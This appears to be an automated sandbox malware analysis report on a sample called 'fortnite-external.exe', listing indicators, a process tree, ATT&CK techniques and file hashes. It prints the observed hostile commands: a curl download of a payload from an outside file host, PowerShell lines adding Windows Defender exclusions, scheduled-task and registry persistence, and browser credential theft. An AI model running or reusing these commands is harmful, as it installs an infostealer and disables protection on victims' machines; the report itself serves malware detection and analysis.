Analysis
-
max time kernel
78s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
21/09/2024, 01:26
Static task
static1
Behavioral task
behavioral1
Sample
fortnite-external.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
fortnite-external.exe
Resource
win10v2004-20240802-en
General
-
Target
fortnite-external.exe
-
Size
392KB
-
MD5
450270d6a68cf6364e98f16b917a84e6
-
SHA1
3e89467c9cbc12a76ab77c50913ee45420e16ccc
-
SHA256
30a300329684903e2ca4a937aacbfb337ab30474aadd40e473ca544e8069c52d
-
SHA512
27c7b9c03a026ba578d6c71f6805d07a702740ce21f2e738cadb7fd2d455d6b1abf620c5b147ee018494a33376ff4e907bdf8ce0fa76f7970abe6cd03da6b4b6
-
SSDEEP
6144:whcdTWDsDiY4ElESAtEnESbkaXOahqJiSxRODbGWrZjkmn35GYrZ8RA:fdxE7xr4kmnJ
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\System.exe\"" msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Local\\System.exe\", \"C:\\Edge\\msedge.exe\"" msedge.exe -
Process spawned unexpected child process 6 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5092 852 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2612 852 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4972 852 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 684 852 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2216 852 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2004 852 schtasks.exe 92 -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4596 powershell.exe 4412 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation msedge.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation fortnite-external.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 3 IoCs
pid Process 4692 physmeme.exe 1444 msedge.exe 4452 System.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Edge\\msedge.exe\"" msedge.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "\"C:\\Users\\Admin\\AppData\\Local\\System.exe\"" msedge.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC59D113EAF44D48E2978B39523CDA7A32.TMP csc.exe File created \??\c:\Windows\System32\u5btjl.exe csc.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1640 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Local Settings msedge.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1640 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5092 schtasks.exe 2612 schtasks.exe 4972 schtasks.exe 684 schtasks.exe 2216 schtasks.exe 2004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 1444 msedge.exe 4596 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe 4596 powershell.exe 4596 powershell.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe 4452 System.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1444 msedge.exe Token: SeDebugPrivilege 4596 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 4452 System.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 3384 wrote to memory of 4612 3384 fortnite-external.exe 86 PID 3384 wrote to memory of 4612 3384 fortnite-external.exe 86 PID 4612 wrote to memory of 4584 4612 cmd.exe 87 PID 4612 wrote to memory of 4584 4612 cmd.exe 87 PID 3384 wrote to memory of 4692 3384 fortnite-external.exe 93 PID 3384 wrote to memory of 4692 3384 fortnite-external.exe 93 PID 3384 wrote to memory of 4692 3384 fortnite-external.exe 93 PID 4692 wrote to memory of 1460 4692 physmeme.exe 94 PID 4692 wrote to memory of 1460 4692 physmeme.exe 94 PID 4692 wrote to memory of 1460 4692 physmeme.exe 94 PID 1460 wrote to memory of 4580 1460 WScript.exe 98 PID 1460 wrote to memory of 4580 1460 WScript.exe 98 PID 1460 wrote to memory of 4580 1460 WScript.exe 98 PID 4580 wrote to memory of 1444 4580 cmd.exe 100 PID 4580 wrote to memory of 1444 4580 cmd.exe 100 PID 1444 wrote to memory of 400 1444 msedge.exe 104 PID 1444 wrote to memory of 400 1444 msedge.exe 104 PID 400 wrote to memory of 1728 400 csc.exe 106 PID 400 wrote to memory of 1728 400 csc.exe 106 PID 1444 wrote to memory of 4412 1444 msedge.exe 110 PID 1444 wrote to memory of 4412 1444 msedge.exe 110 PID 1444 wrote to memory of 4596 1444 msedge.exe 111 PID 1444 wrote to memory of 4596 1444 msedge.exe 111 PID 1444 wrote to memory of 2960 1444 msedge.exe 114 PID 1444 wrote to memory of 2960 1444 msedge.exe 114 PID 2960 wrote to memory of 3688 2960 cmd.exe 116 PID 2960 wrote to memory of 3688 2960 cmd.exe 116 PID 2960 wrote to memory of 1640 2960 cmd.exe 117 PID 2960 wrote to memory of 1640 2960 cmd.exe 117 PID 2960 wrote to memory of 4452 2960 cmd.exe 119 PID 2960 wrote to memory of 4452 2960 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:4584
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Edge\fu4i1MBsp.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Edge\msedge.exe"C:\Edge/msedge.exe"5⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1444 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z53ulwg2\z53ulwg2.cmdline"6⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EED.tmp" "c:\Windows\System32\CSC59D113EAF44D48E2978B39523CDA7A32.TMP"7⤵PID:1728
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\System.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\by0wam3S22.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:3688
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1640
-
-
C:\Users\Admin\AppData\Local\System.exe"C:\Users\Admin\AppData\Local\System.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\System.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5092
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "SystemS" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\AppData\Local\System.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4972
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Edge\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:684
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2216
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 12 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2004
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
192B
MD5e5437373d0605c93bc97b65a4a12d739
SHA1671858874a65fd9c7d3de894ba4c590b537f0bde
SHA2569440e1281d71c9d954fb0510d3eb29a1270d10eca8394744c5bd91e2e6f83307
SHA5125345d25ba8cbd179fddbc1255e26e5d3f5e2161e99e4be3bfba1ece5ae317c22df8e115415e300ca5763bd993fb45aa0f5cfca0278c8a6eabb29d48548cf0d2f
-
Filesize
63B
MD5f797a77c821b724238a50a77f0fe1aae
SHA1ee9ff366bdfcba73d9ca0753670f2660baaec9f2
SHA25600c0f57e5f833e74c22e63732816c59eb1f9b8cff197eea7373c32aac58d08d7
SHA51204459b565bd18d707af3740f3f76050dc8d1f5cb4d335460fcc9c3658695558b9bf67e82beb25996c86ee7ba4a2705eaa4da55facc44fa1e854552cd49d8aa23
-
Filesize
1.8MB
MD59257cb2730e4744e1fd4565dec8eb3c8
SHA1a9147f6de05447b78bd78b71517a650028498836
SHA2562964966063f51dd2c3d381468a9d9091d8581442b9d63564af056274cb797061
SHA5120b2228b607a3aa0302515312ab5f9cf86b78c44b94bba7a53507afba00d55208d1387585cd8c0714a9c66831bf99036d91fb81398d6806fd2e086d6019e67e6c
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
291B
MD50f7dbd21cc3fe3098bf1f11eb57c8318
SHA12b8074fee3f705fb016f9aef8050609cdef14919
SHA256967d57aeaeef5cff01ef1c4c51126c5e74319b335a95dae5fab0ab56ad80dc04
SHA512a6b7b7be67b79d8fe26dba63eec35d9f127979c21d77f7a2fa81579a7662ced49bf36f49cb5bb0c91d53dafeb955ee14505653beb4948917f0fc264ec2e7cd2b
-
Filesize
1KB
MD5b4c3af7f3f7d6a1cdc66b1836d53a04f
SHA13c3d48fed1fa08011f19ccf02f43aaee4e9b0fad
SHA256ee0a82c815be2469776a7007a4fd42dfce91850504899d03664b5f04f45b0ef3
SHA5129f9e46ee762071de0da6c5b1dfed94a6d801adacf3147c65f6f6fbf5a4eb86d3e30206583b1a6ac94117c5a889f00e246362d0dcdb1ab87fb3d99405b1dd275f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
167B
MD587ec149fbd4778c73d798b1b00564dac
SHA13b0d51c5171d09c92b0df5718eb1b171d8c2dfd8
SHA256293e83433667c0847be0f297c93042bd4f9951d061babac7ccc1b0e21a3cf227
SHA512b64d30afad423e5b94956e95eeed9066487b0ee57067642dae7c74abe30ee57b9830c3a59d6d416e7010dff50924531a03f971c800f8063f60903f2de6aed50c
-
Filesize
2.1MB
MD5e5f3f9c01d860a57b5dbc30b44ab4ba0
SHA14a7a9c4aba1968491fcabea3abeaa5ecf3fcb71d
SHA256bd86ed3a268c8e85089ad0602b8894a6463b61569d64b92b63a4c5ab5fed5c0b
SHA512e771a3370cc9706be105ccf8e732e4502845bdbd2b26d9b47ec5766497f419157e01baccd36c8e418fb25de284effcef2da6683f62ca561786c7353140e0a55f
-
Filesize
371B
MD5b7af5deecd65d07f607e73f0c883537a
SHA1d01eaf7e234e28c8079deaba5cddb47e735e0f2d
SHA25627912fbf2d345cdbfaf649f4dac762ed48ba7bd1866fb6bbf82eff50db09e6ef
SHA5124b11922064da12499cc4de78776bc6cddfe7c1dd3037b8d0542aac9d803476b04c1d94df3875a262fb7d80348f2a3d807562af25d9d00e6a10de2ed22f25cbd9
-
Filesize
235B
MD5b2a2a3fd813690fb3f0c2463e40ef648
SHA1df56e967cb0f10b3844f12813f7ceb6cb9a49796
SHA25694b8a71f7f95b0dc8400d01910eabeec7c4f1cd6609984818d1e45eb1b66e68f
SHA51289c3ba95a9b8308f841dc4ef15c0e2b91902514a700a5b570f34cdead92742751469d12b11d6a82a68931afed3f8fb0e4ed58b6f22151ad0b3d1c6df6eec7d95
-
Filesize
1KB
MD552518a92f331588448b74e01d4a5e1b3
SHA1b892bb6afae8b3ab118acca34f5bc1ac313c8db1
SHA25670a69c529c9916a04e96a2624c783f69604958fc79c7ebaa5668f0b00d80741e
SHA5125c33961c848783c686257dc20adc5fc40167edb7f16ca12e1fdfb7dfa2867cc2390d3d92e4916f0bad5c31f676018dc7333072e95774e91ed275a02bce263467